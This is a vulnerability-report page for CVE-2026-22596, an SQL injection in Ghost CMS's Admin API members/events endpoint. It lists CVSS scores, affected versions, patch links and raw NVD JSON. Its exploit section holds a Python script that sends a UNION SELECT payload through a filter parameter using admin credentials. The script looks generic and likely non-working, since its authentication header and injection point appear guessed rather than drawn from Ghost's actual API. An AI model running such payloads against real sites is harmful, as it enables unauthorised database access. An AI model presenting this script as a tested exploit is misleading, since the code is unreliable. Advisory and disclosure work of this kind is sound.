Security Vulnerability Report
中文
CVE-2026-22596 CVSS 6.7 MEDIUM

CVE-2026-22596

Published: 2026-01-10 03:15:51
Last Modified: 2026-01-15 18:35:34
Source: [email protected]

Description

Ghost is a Node.js content management system. In versions 5.90.0 through 5.130.5 and 6.0.0 through 6.10.3, a vulnerability in Ghost's /ghost/api/admin/members/events endpoint allows users with authentication credentials for the Admin API to execute arbitrary SQL. This issue has been patched in versions 5.130.6 and 6.11.0.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* - VULNERABLE
Ghost 5.90.0 - 5.130.5
Ghost 6.0.0 - 6.10.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2026-22596 PoC - Ghost CMS SQL Injection # Target: /ghost/api/admin/members/events endpoint TARGET_URL = "http://target-ghost-site.com" API_KEY = "your_admin_api_key" API_SECRET = "your_admin_api_secret" def exploit_sql_injection(): """ Ghost CMS SQL Injection PoC This demonstrates the vulnerability in /ghost/api/admin/members/events Note: Requires valid Admin API credentials """ # Construct the vulnerable endpoint endpoint = f"{TARGET_URL}/ghost/api/admin/members/events" # Malicious SQL payload - example: extract database version # In real attack, attacker would craft various SQL injection payloads sql_payload = "1' UNION SELECT NULL,version(),NULL,NULL,NULL--" headers = { "Authorization": f"Ghost {API_KEY}:{API_SECRET}", "Content-Type": "application/json", "X-ghost-version": "5.x" } # Construct request with malicious parameter params = { "filter": sql_payload, "limit": 10 } try: response = requests.get(endpoint, headers=headers, params=params, timeout=30) if response.status_code == 200: print("[+] Request successful - potential SQL injection vulnerability") print(f"Response: {response.text[:500]}") elif response.status_code == 401: print("[-] Authentication failed - valid admin credentials required") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": print("Ghost CMS CVE-2026-22596 SQL Injection PoC") print("=" * 50) exploit_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22596", "sourceIdentifier": "[email protected]", "published": "2026-01-10T03:15:50.703", "lastModified": "2026-01-15T18:35:34.103", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ghost is a Node.js content management system. In versions 5.90.0 through 5.130.5 and 6.0.0 through 6.10.3, a vulnerability in Ghost's /ghost/api/admin/members/events endpoint allows users with authentication credentials for the Admin API to execute arbitrary SQL. This issue has been patched in versions 5.130.6 and 6.11.0."}, {"lang": "es", "value": "Ghost es un sistema de gestión de contenido Node.js. En las versiones 5.90.0 a 5.130.5 y 6.0.0 a 6.10.3, una vulnerabilidad en el endpoint /ghost/api/admin/members/events de Ghost permite a los usuarios con credenciales de autenticación para la API de administración ejecutar SQL arbitrario. Este problema ha sido parcheado en las versiones 5.130.6 y 6.11.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "5.90.0", "versionEndExcluding": "5.130.6", "matchCriteriaId": "2D327CA9-FD73-4ABD-96CF-093B90712BA8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.11.0", "matchCriteriaId": "9EC484AC-A1F0-4C13-BFAB-9DA57116957D"}]}]}], "references": [{"url": "https://github.com/TryGhost/Ghost/commit/cda236e455a7a30e828b6cba3c430e5796ded955", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/TryGhost/Ghost/commit/f2165f968bcdaae0e35590b38fa280ab03239391", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/TryGhost/Ghost/security/advisories/GHSA-gjrp-xgmh-x9qq", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.